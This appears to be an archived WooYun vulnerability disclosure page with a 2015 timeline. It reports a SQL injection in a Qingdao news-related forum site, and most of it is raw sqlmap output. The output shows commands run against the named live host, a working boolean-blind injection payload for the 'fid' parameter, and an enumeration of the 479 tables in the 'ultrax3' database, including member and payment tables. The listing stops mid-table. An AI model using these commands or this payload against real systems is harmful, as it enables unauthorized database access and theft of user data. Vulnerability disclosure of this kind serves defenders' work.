乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-14: 细节已通知厂商并且等待厂商处理中 2015-09-15: 厂商已经确认,细节仅向厂商公开 2015-09-25: 细节向核心白帽子及相关领域专家公开 2015-10-05: 细节向普通白帽子公开 2015-10-15: 细节向实习白帽子公开 2015-10-30: 细节向公众公开
RT
root@root:~# sqlmap -u http://yezhu.qingdaonews.com/threadcount.php?fid=656 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 14:39:56[14:39:56] [INFO] resuming back-end DBMS 'mysql' [14:39:56] [INFO] testing connection to the target URL[14:39:57] [INFO] heuristics detected web page charset 'ascii'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=656' AND 5921=5921 AND 'QYrB'='QYrB---[14:39:57] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL 5[14:39:57] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/yezhu.qingdaonews.com'[*] shutting down at 14:39:57root@root:~# sqlmap -u http://yezhu.qingdaonews.com/threadcount.php?fid=656 --tables -D ultrax3 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 14:40:11[14:40:11] [INFO] resuming back-end DBMS 'mysql' [14:40:11] [INFO] testing connection to the target URL[14:40:13] [INFO] heuristics detected web page charset 'ascii'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fid=656' AND 5921=5921 AND 'QYrB'='QYrB---[14:40:13] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.25back-end DBMS: MySQL 5[14:40:13] [INFO] fetching tables for database: 'ultrax3'[14:40:13] [INFO] fetching number of tables for database 'ultrax3'[14:40:13] [INFO] resumed: 480[14:40:13] [INFO] resumed: always_on_topbottom[14:40:13] [INFO] resumed: fifth[14:40:13] [INFO] resumed: first[14:40:13] [INFO] resumed: formula[14:40:13] [INFO] resumed: forum_rank[14:40:13] [INFO] resumed: fourth[14:40:13] [INFO] resumed: ggl_main[14:40:13] [INFO] resumed: ggl_result[14:40:13] [INFO] resumed: ggl_shidaicheng[14:40:13] [INFO] resumed: gjj[14:40:13] [INFO] resumed: guagua[14:40:13] [INFO] resumed: guagua_1[14:40:13] [INFO] resumed: guagua_7080[14:40:13] [INFO] resumed: house_1024[14:40:13] [INFO] resumed: house_2048[14:40:13] [INFO] resumed: huodong[14:40:13] [INFO] resumed: huodong_xg[14:40:13] [INFO] resumed: kl3w_guise_idlog[14:40:13] [INFO] resumed: map[14:40:13] [INFO] resumed: map_content[14:40:13] [INFO] resumed: marqueedraw_main[14:40:13] [INFO] resumed: marqueedraw_result[14:40:13] [INFO] resumed: pay_scan_content[14:40:13] [INFO] resumed: pay_scan_log[14:40:13] [INFO] resumed: permit[14:40:13] [INFO] resumed: post[14:40:13] [INFO] resumed: pre_baidusubmit_setting[14:40:13] [INFO] resumed: pre_baidusubmit_sitemap[14:40:13] [INFO] resumed: pre_baidusubmit_urlstat[14:40:13] [INFO] resumed: pre_benevolence_7ree[14:40:13] [INFO] resumed: pre_board_count[14:40:13] [INFO] resumed: pre_codejm_denglu_bindinfo[14:40:13] [INFO] resumed: pre_common_addon[14:40:13] [INFO] resumed: pre_common_admincp_cmenu[14:40:13] [INFO] resumed: pre_common_admincp_group[14:40:13] [INFO] resumed: pre_common_admincp_member[14:40:13] [INFO] resumed: pre_common_admincp_perm[14:40:13] [INFO] resumed: pre_common_admincp_session[14:40:13] [INFO] resumed: pre_common_admingroup[14:40:13] [INFO] resumed: pre_common_adminnote[14:40:13] [INFO] resumed: pre_common_advertisement[14:40:13] [INFO] resumed: pre_common_advertisement_custom[14:40:13] [INFO] resumed: pre_common_analyse[14:40:13] [INFO] resumed: pre_common_banned[14:40:13] [INFO] resumed: pre_common_block[14:40:13] [INFO] resumed: pre_common_block_favorite[14:40:13] [INFO] resumed: pre_common_block_item[14:40:13] [INFO] resumed: pre_common_block_item_data[14:40:13] [INFO] resumed: pre_common_block_permission[14:40:13] [INFO] resumed: pre_common_block_pic[14:40:13] [INFO] resumed: pre_common_block_style[14:40:13] [INFO] resumed: pre_common_block_xml[14:40:13] [INFO] resumed: pre_common_cache[14:40:13] [INFO] resumed: pre_common_card[14:40:13] [INFO] resumed: pre_common_card_log[14:40:13] [INFO] resumed: pre_common_card_type[14:40:13] [INFO] resumed: pre_common_connect_guest[14:40:13] [INFO] resumed: pre_common_credit_log[14:40:13] [INFO] resumed: pre_common_credit_log_field[14:40:13] [INFO] resumed: pre_common_credit_rule[14:40:13] [INFO] resumed: pre_common_credit_rule_log[14:40:13] [INFO] resumed: pre_common_credit_rule_log_field[14:40:13] [INFO] resumed: pre_common_cron[14:40:13] [INFO] resumed: pre_common_devicetoken[14:40:13] [INFO] resumed: pre_common_district[14:40:13] [INFO] resumed: pre_common_diy_data[14:40:13] [INFO] resumed: pre_common_domain[14:40:13] [INFO] resumed: pre_common_failedip[14:40:13] [INFO] resumed: pre_common_failedlogin[14:40:13] [INFO] resumed: pre_common_friendlink[14:40:13] [INFO] resumed: pre_common_grouppm[14:40:13] [INFO] resumed: pre_common_hot[14:40:13] [INFO] resumed: pre_common_invite[14:40:13] [INFO] resumed: pre_common_magic[14:40:13] [INFO] resumed: pre_common_magiclog[14:40:13] [INFO] resumed: pre_common_mailcron[14:40:13] [INFO] resumed: pre_common_mailqueue[14:40:13] [INFO] resumed: pre_common_member[14:40:13] [INFO] resumed: pre_common_member_action_log[14:40:13] [INFO] resumed: pre_common_member_archive[14:40:13] [INFO] resumed: pre_common_member_connect[14:40:13] [INFO] resumed: pre_common_member_count[14:40:13] [INFO] resumed: pre_common_member_count_archive[14:40:13] [INFO] resumed: pre_common_member_crime[14:40:13] [INFO] resumed: pre_common_member_field_forum[14:40:13] [INFO] resumed: pre_common_member_field_forum_archive[14:40:13] [INFO] resumed: pre_common_member_field_home[14:40:13] [INFO] resumed: pre_common_member_field_home_archive[14:40:13] [INFO] resumed: pre_common_member_forum_buylog[14:40:13] [INFO] resumed: pre_common_member_grouppm[14:40:13] [INFO] resumed: pre_common_member_log[14:40:13] [INFO] resumed: pre_common_member_magic[14:40:13] [INFO] resumed: pre_common_member_medal[14:40:13] [INFO] resumed: pre_common_member_newprompt[14:40:13] [INFO] resumed: pre_common_member_profile[14:40:13] [INFO] resumed: pre_common_member_profile_archive[14:40:13] [INFO] resumed: pre_common_member_profile_setting[14:40:13] [INFO] resumed: pre_common_member_security[14:40:13] [INFO] resumed: pre_common_member_secwhite[14:40:13] [INFO] resumed: pre_common_member_stat_field[14:40:13] [INFO] resumed: pre_common_member_stat_fieldcache[14:40:13] [INFO] resumed: pre_common_member_stat_search[14:40:13] [INFO] resumed: pre_common_member_stat_searchcache[14:40:13] [INFO] resumed: pre_common_member_status[14:40:13] [INFO] resumed: pre_common_member_status_archive[14:40:13] [INFO] resumed: pre_common_member_validate[14:40:13] [INFO] resumed: pre_common_member_verify[14:40:13] [INFO] resumed: pre_common_member_verify_info[14:40:13] [INFO] resumed: pre_common_member_wechat[14:40:13] [INFO] resumed: pre_common_member_wechatmp[14:40:13] [INFO] resumed: pre_common_moderate[14:40:13] [INFO] resumed: pre_common_myapp[14:40:13] [INFO] resumed: pre_common_myinvite[14:40:13] [INFO] resumed: pre_common_mytask[14:40:13] [INFO] resumed: pre_common_nav[14:40:13] [INFO] resumed: pre_common_onlinetime[14:40:13] [INFO] resumed: pre_common_optimizer[14:40:13] [INFO] resumed: pre_common_patch[14:40:13] [INFO] resumed: pre_common_plugin[14:40:13] [INFO] resumed: pre_common_pluginvar[14:40:13] [INFO] resumed: pre_common_process[14:40:13] [INFO] resumed: pre_common_regip[14:40:13] [INFO] resumed: pre_common_relatedlink[14:40:13] [INFO] resumed: pre_common_remote_port[14:40:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:40:13] [INFO] retrieved: pre_common_report[14:40:23] [INFO] retrieved: pre_common_searchindex[14:40:33] [INFO] retrieved: pre_common_seccheck[14:40:41] [INFO] retrieved: pre_common_secquestion[14:40:55] [INFO] retrieved: pre_common_session[14:40:59] [INFO] retrieved: pre_common_setting[14:41:03] [INFO] retrieved: pre_common_smiley[14:41:06] [INFO] retrieved: pre_common_sphinxcounter[14:41:20] [INFO] retrieved: pre_common_stat[14:41:22] [INFO] retrieved: pre_common_statuser[14:41:25] [INFO] retrieved: pre_common_style[14:41:28] [INFO] retrieved: pre_common_stylevar[14:41:31] [INFO] retrieved: pre_common_syscache[14:41:38] [INFO] retrieved: pre_common_tag[14:41:43] [INFO] retrieved: pre_common_tagitem[14:41:48] [INFO] retrieved: pre_common_task[14:41:51] [INFO] retrieved: pre_common_taskvar[14:41:54] [INFO] retrieved: pre_common_template[14:42:02] [INFO] retrieved: pre_common_template_block[14:42:07] [INFO] retrieved: pre_common_template_permission[14:42:13] [INFO] retrieved: pre_common_uin_black[14:42:19] [INFO] retrieved: pre_common_usergroup[14:42:26] [INFO] retrieved: pre_common_usergroup_field[14:42:32] [INFO] retrieved: pre_common_visit[14:42:35] [INFO] retrieved: pre_common_word[14:42:38] [INFO] retrieved: pre_common_word_type[14:42:45] [INFO] retrieved: pre_connect_disktask[14:42:55] [INFO] retrieved: pre_connect_feedlog[14:43:04] [INFO] retrieved: pre_connect_memberbindlog[14:43:11] [INFO] retrieved: pre_connect_postfeedlog[14:43:16] [INFO] retrieved: pre_connect_tthreadlog[14:43:22] [INFO] retrieved: pre_dsu_paulsign[14:43:34] [INFO] retrieved: pre_dsu_paulsignemot[14:43:44] [INFO] retrieved: pre_dsu_paulsignset[14:43:52] [INFO] retrieved: pre_dzp[14:43:54] [INFO] retrieved: pre_dzp_jp[14:43:56] [INFO] retrieved: pre_forum_access[14:44:04] [INFO] retrieved: pre_forum_activity[14:44:08] [INFO] retrieved: pre_forum_activityapply[14:44:18] [INFO] retrieved: pre_forum_announcement[14:44:33] [INFO] retrieved: pre_forum_attachment[14:44:41] [INFO] retrieved: pre_forum_attachment_0[14:44:44] [INFO] retrieved: pre_forum_attachment_1[14:44:49] [INFO] retrieved: pre_forum_attachment_2[14:44:52] [INFO] retrieved: pre_forum_attachment_3[14:44:54] [INFO] retrieved: pre_forum_attachment_4[14:44:59] [INFO] retrieved: pre_forum_attachment_5[14:45:01] [INFO] retrieved: pre_forum_attachment_6[14:45:04] [INFO] retrieved: pre_forum_attachment_7[14:45:06] [INFO] retrieved: pre_forum_attachment_8[14:45:08] [INFO] retrieved: pre_forum_attachment_9[14:45:13] [INFO] retrieved: pre_forum_attachment_exif[14:45:20] [INFO] retrieved: pre_forum_attachment_unused[14:45:25] [INFO] retrieved: pre_forum_attachtype[14:45:31] [INFO] retrieved: pre_forum_bbcode[14:45:37] [INFO] retrieved: pre_forum_collection[14:45:43] [INFO] retrieved: pre_forum_collectioncomment[14:45:51] [INFO] retrieved: pre_forum_collectionfollow[14:46:04] [INFO] retrieved: pre_forum_collectioninvite[14:46:12] [INFO] retrieved: pre_forum_collectionrelated[14:46:20] [INFO] retrieved: pre_forum_collectionteamworker[14:46:29] [INFO] retrieved: pre_forum_collectionthread[14:46:39] [INFO] retrieved: pre_forum_creditslog[14:46:47] [INFO] retrieved: pre_forum_debate[14:47:02] [INFO] retrieved: pre_forum_debatepost[14:47:06] [INFO] retrieved: pre_forum_faq[14:47:11] [INFO] retrieved: pre_forum_filter_post[14:47:19] [INFO] retrieved: pre_forum_forum[14:47:22] [INFO] retrieved: pre_forum_forum_threadtable[14:47:31] [INFO] retrieved: pre_forum_forumfield[14:47:34] [INFO] retrieved: pre_forum_forumrecommend[14:47:43] [INFO] retrieved: pre_forum_groupcreditslog[14:47:57] [INFO] retrieved: pre_forum_groupfield[14:48:03] [INFO] retrieved: pre_forum_groupinvite[14:48:13] [INFO] retrieved: pre_forum_grouplevel[14:48:20] [INFO] retrieved: pre_forum_groupranking[14:48:34] [INFO] retrieved: pre_forum_groupuser[14:48:40] [INFO] retrieved: pre_forum_hotreply_member[14:48:51] [INFO] retrieved: pre_forum_hotreply_number[14:49:02] [INFO] retrieved: pre_forum_imagetype[14:49:12] [INFO] retrieved: pre_forum_medal[14:49:21] [INFO] retrieved: pre_forum_medallog[14:49:24] [INFO] retrieved: pre_forum_memberrecommend[14:49:36] [INFO] retrieved: pre_forum_moderator[14:49:43] [INFO] retrieved: pre_forum_modwork[14:49:55] [INFO] retrieved: pre_forum_newthread[14:50:12] [INFO] retrieved: pre_forum_onlinelist[14:50:18] [INFO] retrieved: pre_forum_optionvalue9[14:50:32] [INFO] retrieved: pre_forum_order[14:50:36] [INFO] retrieved: pre_forum_poll[14:50:45] [INFO] retrieved: pre_forum_polloption[14:50:52] [INFO] retrieved: pre_forum_polloption_image[14:50:59] [INFO] retrieved: pre_forum_pollvoter[14:51:05] [INFO] retrieved: pre_forum_post[14:51:07] [INFO] retrieved: pre_forum_post_1[14:51:13] [INFO] retrieved: pre_forum_post_2[14:51:18] [INFO] retrieved: pre_forum_post_3[14:51:22] [INFO] retrieved: pre_forum_post_4[14:51:24] [INFO] retrieved: pre_forum_post_5[14:51:29] [INFO] retrieved: pre_forum_post_6[14:51:31] [INFO] retrieved: pre_forum_post_7[14:51:33] [INFO] retrieved: pre_forum_post_location[14:51:41] [INFO] retrieved: pre_forum_post_moderate[14:51:54] [INFO] retrieved: pre_forum_post_tableid[14:52:10] [INFO] retrieved: pre_forum_postcache[14:52:20] [INFO] retrieved: pre_forum_postcomment[14:52:27] [INFO] retrieved: pre_forum_postlog[14:52:32] [INFO] retrieved: pre_forum_postposition[14:52:46] [INFO] retrieved: pre_forum_poststick[14:52:50] [INFO] retrieved: pre_forum_promotion[14:53:01] [INFO] retrieved: pre_forum_ratelog[14:53:14] [INFO] retrieved: pre_forum_relatedthread[14:53:32] [INFO] retrieved: pre_forum_replycredit[14:53:44] [INFO] retrieved: pre_forum_rsscache[14:54:01] [INFO] retrieved: pre_forum_sofa[14:54:04] [INFO] retrieved: pre_forum_spacecache[14:54:18] [INFO] retrieved: pre_forum_statlog[14:54:28] [INFO] retrieved: pre_forum_thread[14:54:38] [INFO] retrieved: pre_forum_thread_bak_20150910[14:54:51] [INFO] retrieved: pre_forum_thread_moderate[14:54:59] [INFO] retrieved: pre_forum_threadaddviews[14:55:07] [INFO] retrieved: pre_forum_threadcalendar[14:55:13] [INFO] retrieved: pre_forum_threadclass[14:55:17] [INFO] retrieved: pre_forum_threadclosed[14:55:24] [INFO] retrieved: pre_forum_threaddisablepos[14:55:39] [INFO] retrieved: pre_forum_threadhidelog[14:55:53] [INFO] retrieved: pre_forum_threadhot[14:56:02] [INFO] retrieved: pre_forum_threadimage[14:56:08] [INFO] retrieved: pre_forum_threadlog[14:56:11] [INFO] retrieved: pre_forum_threadmod[14:56:17] [INFO] retrieved: pre_forum_threadpartake[14:56:30] [INFO] retrieved: pre_forum_threadpreview[14:56:38] [INFO] retrieved: pre_forum_threadprofile[14:56:50] [INFO] retrieved: pre_forum_threadprofile_group[14:57:01] [INFO] retrieved: pre_forum_threadrush[14:57:08] [INFO] retrieved: pre_forum_threadtype[14:57:17] [INFO] retrieved: pre_forum_trade[14:57:19] [INFO] retrieved: pre_forum_tradecomment[14:57:24] [INFO] retrieved: pre_forum_tradelog[14:57:34] [INFO] retrieved: pre_forum_typeoption[14:57:45] [INFO] retrieved: pre_forum_typeoptionvar[14:57:52] [INFO] retrieved: pre_forum_typevar[14:58:01] [INFO] retrieved: pre_forum_warning[14:58:08] [INFO] retrieved: pre_home_album[14:58:16] [INFO] retrieved: pre_home_album_category[14:58:29] [INFO] retrieved: pre_home_appcreditlog[14:58:41] [INFO] retrieved: pre_home_blacklist[14:58:58] [INFO] retrieved: pre_home_blog[14:59:04] [INFO] retrieved: pre_home_blog_category[14:59:18] [INFO] retrieved: pre_home_blog_moderate[14:59:35] [INFO] retrieved: pre_home_blogfield[14:59:38] [INFO] retrieved: pre_home_class[14:59:48] [INFO] retrieved: pre_home_click[15:00:00] [INFO] retrieved: pre_home_clickuser[15:00:05] [INFO] retrieved: pre_home_comment[15:00:12] [INFO] retrieved: pre_home_comment_moderate[15:00:24] [INFO] retrieved: pre_home_docomment[15:00:29] [INFO] retrieved: pre_home_doing[15:00:34] [INFO] retrieved: pre_home_doing_moderate[15:00:48] [INFO] retrieved: pre_home_favorite[15:01:06] [INFO] retrieved: pre_home_feed[15:01:14] [INFO] retrieved: pre_home_feed_app[15:01:20] [INFO] retrieved: pre_home_follow[15:01:27] [INFO] retrieved: pre_home_follow_feed[15:01:30] [INFO] retrieved: pre_home_follow_feed_archiver[15:01:51] [INFO] retrieved: pre_home_friend[15:01:57] [INFO] retrieved: pre_home_friend_request[15:02:11] [INFO] retrieved: pre_home_friendlog[15:02:23] [INFO] retrieved: pre_home_notification[15:02:39] [INFO] retrieved: pre_home_pic[15:02:44] [INFO] retrieved: pre_home_pic_moderate[15:02:59] [INFO] retrieved: pre_home_picfield[15:03:02] [INFO] retrieved: pre_home_poke[15:03:14] [INFO] retrieved: pre_home_pokearchive[15:03:21] [INFO] retrieved: pre_home_share[15:03:33] [INFO] retrieved: pre_home_share_moderate[15:03:45] [INFO] retrieved: pre_home_show[15:03:50] [INFO] retrieved: pre_home_specialuser[15:04:11] [INFO] retrieved: pre_home_userapp[15:04:21] [INFO] retrieved: pre_home_userappfield[15:04:27] [INFO] retrieved: pre_home_visitor[15:04:34] [INFO] retrieved: pre_hux_wx[15:04:40] [INFO] retrieved: pre_hux_wx_action[15:04:51] [INFO] retrieved: pre_hux_wx_config[15:04:58] [INFO] retrieved: pre_hux_wx_userjp[15:05:04] [INFO] retrieved: pre_inner_page[15:05:17] [INFO] retrieved: pre_inner_page_config[15:05:23] [INFO] retrieved: pre_innermember[15:05:37] [INFO] retrieved: pre_innertopic_stat[15:05:52] [INFO] retrieved: pre_k_spider[15:05:59] [INFO] retrieved: pre_mobile_setting[15:06:16] [INFO] retrieved: pre_mobile_wechat_authcode[15:06:32] [INFO] retrieved: pre_mobile_wechat_masssend[15:06:48] [INFO] retrieved: pre_mobile_wechat_resource[15:06:56] [INFO] retrieved: pre_mobile_wsq_threadlist[15:07:11] [INFO] retrieved: pre_mobileoem_member[15:07:19] [INFO] retrieved: pre_mobileoem_pushthreads[15:07:29] [INFO] retrieved: pre_moder_rank[15:07:36] [INFO] retrieved: pre_myrepeats[15:07:43] [INFO] retrieved: pre_nayuan_report_component[15:08:06] [INFO] retrieved: pre_plugin_auction[15:08:28] [INFO] retrieved: pre_plugin_auction_message[15:08:43] [INFO] retrieved: pre_plugin_auction_xml[15:08:49] [INFO] retrieved: pre_plugin_auctionapply[15:09:03] [INFO] retrieved: pre_plugin_autoreply_member[15:09:26] [INFO] retrieved: pre_plugin_autoreply_thread[15:09:37] [INFO] retrieved: pre_plugin_banklist[15:09:45] [INFO] retrieved: pre_plugin_banklog[15:09:50] [INFO] retrieved: pre_plugin_bankoperation[15:10:03] [INFO] retrieved: pre_plugin_monthmoney[15:10:12] [INFO] retrieved: pre_portal_article_content[15:10:49] [INFO] retrieved: pre_portal_article_count[15:11:02] [INFO] retrieved: pre_portal_article_moderate[15:11:13] [INFO] retrieved: pre_portal_article_related[15:11:27] [INFO] retrieved: pre_portal_article_title[15:11:36] [INFO] retrieved: pre_portal_article_trash[15:11:39] [INFO] retrieved: pre_portal_attachment[15:11:56] [INFO] retrieved: pre_portal_category[15:12:10] [INFO] retrieved: pre_portal_category_permission[15:12:26] [INFO] retrieved: pre_portal_comment[15:12:30] [INFO] retrieved: pre_portal_comment_moderate[15:12:41] [INFO] retrieved: pre_portal_rsscache[15:12:48] [INFO] retrieved: pre_portal_topic[15:13:03] [INFO] retrieved: pre_portal_topic_pic[15:13:19] [INFO] retrieved: pre_post_count[15:13:26] [INFO] retrieved: pre_security_evilpost[15:13:37] [INFO] retrieved: pre_security_eviluser[15:13:47] [INFO] retrieved: pre_security_failedlog[15:14:02] [INFO] retrieved: pre_tujoin_copyright[15:14:22] [INFO] retrieved: pre_ucenter_admins[15:14:44] [INFO] retrieved: pre_ucenter_applications[15:15:00] [INFO] retrieved: pre_ucenter_badwords[15:15:19] [INFO] retrieved: pre_ucenter_domains[15:15:26] [INFO] retrieved: pre_ucenter_failedlogins[15:15:39] [INFO] retrieved: pre_ucenter_feeds[15:15:49] [INFO] retrieved: pre_ucenter_friends[15:16:00] [INFO] retrieved: pre_ucenter_mailqueue[15:16:29] [INFO] retrieved: pre_ucenter_memberfields[15:16:46] [INFO] retrieved: pre_ucenter_members[15:16:51] [INFO] retrieved: pre_ucenter_mergemembers[15:17:13] [INFO] retrieved: pre_ucenter_newpm[15:17:29] [INFO] retrieved: pre_ucenter_notelist[15:17:43] [INFO] retrieved: pre_ucenter_pm_indexes[15:17:58] [INFO] retrieved: pre_ucenter_pm_lists[15:18:05] [INFO] retrieved: pre_ucenter_pm_members[15:18:14] [INFO] retrieved: pre_ucenter_pm_messages_0[15:18:29] [INFO] retrieved: pre_ucenter_pm_messages_1[15:18:33] [INFO] retrieved: pre_ucenter_pm_messages_2[15:18:39] [INFO] retrieved: pre_ucenter_pm_messages_3[15:18:42] [INFO] retrieved: pre_ucenter_pm_messages_4[15:18:47] [INFO] retrieved: pre_ucenter_pm_messages_5[15:18:53] [INFO] retrieved: pre_ucenter_pm_messages_6[15:19:01] [INFO] retrieved: pre_ucenter_pm_messages_7[15:19:08] [INFO] retrieved: pre_ucenter_pm_messages_8[15:19:12] [INFO] retrieved: pre_ucenter_pm_messages_9[15:19:24] [INFO] retrieved: pre_ucenter_protectedmembers[15:19:47] [INFO] retrieved: pre_ucenter_settings[15:20:03] [INFO] retrieved: pre_ucenter_sqlcache[15:20:10] [INFO] retrieved: pre_ucenter_tags[15:20:23] [INFO] retrieved: pre_ucenter_vars[15:20:29] [INFO] retrieved: pre_wuxin_findyou[15:20:47] [INFO] retrieved: pre_wz_postvisitors[15:21:02] [INFO] retrieved: qdfangchan[15:21:16] [INFO] retrieved: reg[15:21:23] [INFO] retrieved: stat_mod[15:21:33] [INFO] retrieved: sys_auth[15:21:45] [INFO] retrieved: sys_log[15:21:47] [INFO] retrieved: sys_menu[15:21:53] [INFO] retrieved: sys_per[15:21:58] [INFO] retrieved: sys_user[15:22:03] [INFO] retrieved: tem_log[15:22:13] [INFO] retrieved: tem_vote[15:22:15] [INFO] retrieved: third[15:22:24] [INFO] retrieved: vote_activity[15:22:46] [INFO] retrieved: vote_log[15:22:54] [INFO] retrieved: vote_rule[15:23:02] [INFO] retrieved: vote_works[15:23:14] [INFO] retrieved: vote_wxr[15:23:19] [INFO] retrieved: weixin2014[15:23:36] [INFO] retrieved: weixin_2[15:23:46] [INFO] retrieved: wx_alipay_orderlist[15:24:10] [INFO] retrieved: wx_annaxi[15:24:16] [INFO] retrieved: wx_annaxi_book[15:24:22] [INFO] retrieved: wx_annaxi_user[15:24:28] [INFO] retrieved: wx_cailou[15:24:34] [INFO] retrieved: wx_fm[15:24:38] [INFO] retrieved: wx_ggl_haibo[15:24:46] [INFO] retrieved: wx_ggl_haibo_jp[15:24:49] [INFO] retrieved: wx_ggl_share[15:25:02] [INFO] retrieved: wx_ggl_text[15:25:06] [INFO] retrieved: wx_heda_book[15:25:25] [INFO] retrieved: wx_house_xnyw[15:25:31] [INFO] retrieved: wx_house_yao[15:25:39] [INFO] retrieved: wx_huodong_shake[15:26:00] [INFO] retrieved: wx_jiaju_home_cate[15:26:23] [INFO] retrieved: wx_jiaju_home_copy[15:26:29] [INFO] retrieved: wx_jiaju_home_pic[15:26:38] [INFO] retrieved: wx_jiaju_homes[15:26:39] [INFO] retrieved: wx_level[15:26:41] [INFO] retrieved: wx_lvhua[15:26:53] [INFO] retrieved: wx_lvhua_zan[15:26:58] [INFO] retrieved: wx_qingren[15:27:05] [INFO] retrieved: wx_villa[15:27:08] [INFO] retrieved: wx_weather[15:27:26] [INFO] retrieved: wx_wxpay[15:27:39] [INFO] retrieved: wx_wxpay_bm[15:27:41] [INFO] retrieved: wx_wxpay_code[15:27:47] [INFO] retrieved: wx_wxpay_code_zhgj[15:27:53] [INFO] retrieved: wx_wxpay_codeid_sm1[15:27:57] [INFO] retrieved: wx_wxpay_liqun[15:28:10] [INFO] retrieved: wx_wxpay_liqun_pecode[15:28:23] [INFO] retrieved: wx_wxpay_liqun_sm[15:28:25] [INFO] retrieved: wx_wxpay_notice[15:28:36] [INFO] retrieved: wx_wxpay_orderlist[15:28:51] [INFO] retrieved: wx_wxpay_orderlist_jiaju[15:29:01] [INFO] retrieved: wx_wxpay_orderlist_sm[15:29:07] [INFO] retrieved: wx_wxpay_orderlist_zhgj[15:29:14] [INFO] retrieved: wx_wxpay_right[15:29:23] [INFO] retrieved: wx_wxpay_tmh[15:29:35] [INFO] retrieved: wx_wxpay_tmh_user[15:29:42] [INFO] retrieved: wx_wxpay_tran_sm[15:29:55] [INFO] retrieved: wx_wxpay_user[15:30:04] [INFO] retrieved: wx_wxpay_user_jiaju[15:30:17] [INFO] retrieved: wx_wxpay_user_sm[15:30:23] [INFO] retrieved: wx_wxpay_user_zhgj[15:30:38] [INFO] retrieved: wx_yuhai_book[15:30:49] [INFO] retrieved: wxl_admin[15:30:58] [INFO] retrieved: wxl_life[15:31:01] [INFO] retrieved: wxl_lroom[15:31:06] [INFO] retrieved: wxl_lroom_order[15:31:16] [INFO] retrieved: wxl_lroom_route[15:31:28] [INFO] retrieved: wxl_member[15:31:34] [INFO] retrieved: wxl_mesboard[15:31:40] [INFO] retrieved: wxl_module[15:31:46] [INFO] retrieved: wxl_picture[15:31:56] [INFO] retrieved: wxl_picture_active[15:32:04] [INFO] retrieved: wxl_picture_config[15:32:20] [INFO] retrieved: wxl_picture_engin[15:32:44] [INFO] retrieved: wxl_picture_proto[15:32:51] [INFO] retrieved: wxl_uppic[15:32:57] [INFO] retrieved: wxl_vote[15:33:07] [INFO] retrieved: wxl_vote_rate[15:33:12] [INFO] retrieved: wxl_wechat[15:33:28] [INFO] retrieved: wydc[15:33:32] [INFO] retrieved: xk_baseconfig[15:33:44] [INFO] retrieved: xk_spider_job[15:33:59] [INFO] retrieved: xk_spider_job_later[15:34:09] [INFO] retrieved: xk_spider_url[15:34:24] [INFO] retrieved: xk_statiq[15:34:42] [INFO] retrieved: [15:34:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[15:34:42] [INFO] retrieved: yz_build[15:34:56] [INFO] retrieved: yz_owner[15:35:01] [INFO] retrieved: yz_owner_his[15:35:03] [INFO] retrieved: yz_owner_invites[15:35:08] [INFO] retrieved: zp_main[15:35:12] [INFO] retrieved: zp_resultDatabase: ultrax3[479 tables]+---------------------------------------+| first || always_on_topbottom || fifth || formula || forum_rank || fourth || ggl_main || ggl_result || ggl_shidaicheng || gjj || guagua || guagua_1 || guagua_7080 || house_1024 || house_2048 || huodong || huodong_xg || kl3w_guise_idlog || map || map_content || marqueedraw_main || marqueedraw_result || pay_scan_content || pay_scan_log || permit || post || pre_baidusubmit_setting || pre_baidusubmit_sitemap || pre_baidusubmit_urlstat || pre_benevolence_7ree || pre_board_count || pre_codejm_denglu_bindinfo || pre_common_addon || pre_common_admincp_cmenu || pre_common_admincp_group || pre_common_admincp_member || pre_common_admincp_perm || pre_common_admincp_session || pre_common_admingroup || pre_common_adminnote || pre_common_advertisement || pre_common_advertisement_custom || pre_common_analyse || pre_common_banned || pre_common_block || pre_common_block_favorite || pre_common_block_item || pre_common_block_item_data || pre_common_block_permission || pre_common_block_pic || pre_common_block_style || pre_common_block_xml || pre_common_cache || pre_common_card || pre_common_card_log || pre_common_card_type || pre_common_connect_guest || pre_common_credit_log || pre_common_credit_log_field || pre_common_credit_rule || pre_common_credit_rule_log || pre_common_credit_rule_log_field || pre_common_cron || pre_common_devicetoken || pre_common_district || pre_common_diy_data || pre_common_domain || pre_common_failedip || pre_common_failedlogin || pre_common_friendlink || pre_common_grouppm || pre_common_hot || pre_common_invite || pre_common_magic || pre_common_magiclog || pre_common_mailcron || pre_common_mailqueue || pre_common_member || pre_common_member_action_log || pre_common_member_archive || pre_common_member_connect || pre_common_member_count || pre_common_member_count_archive || pre_common_member_crime || pre_common_member_field_forum || pre_common_member_field_forum_archive || pre_common_member_field_home || pre_common_member_field_home_archive || pre_common_member_forum_buylog || pre_common_member_grouppm || pre_common_member_log || pre_common_member_magic || pre_common_member_medal || pre_common_member_newprompt || pre_common_member_profile || pre_common_member_profile_archive || pre_common_member_profile_setting || pre_common_member_security || pre_common_member_secwhite || pre_common_member_stat_field || pre_common_member_stat_fieldcache || pre_common_member_stat_search || pre_common_member_stat_searchcache || pre_common_member_status || pre_common_member_status_archive || pre_common_member_validate || pre_common_member_verify || pre_common_member_verify_info || pre_common_member_wechat || pre_common_member_wechatmp || pre_common_moderate || pre_common_myapp || pre_common_myinvite || pre_common_mytask || pre_common_nav || pre_common_onlinetime || pre_common_optimizer || pre_common_patch || pre_common_plugin || pre_common_pluginvar || pre_common_process || pre_common_regip || pre_common_relatedlink || pre_common_remote_port || pre_common_report || pre_common_searchindex || 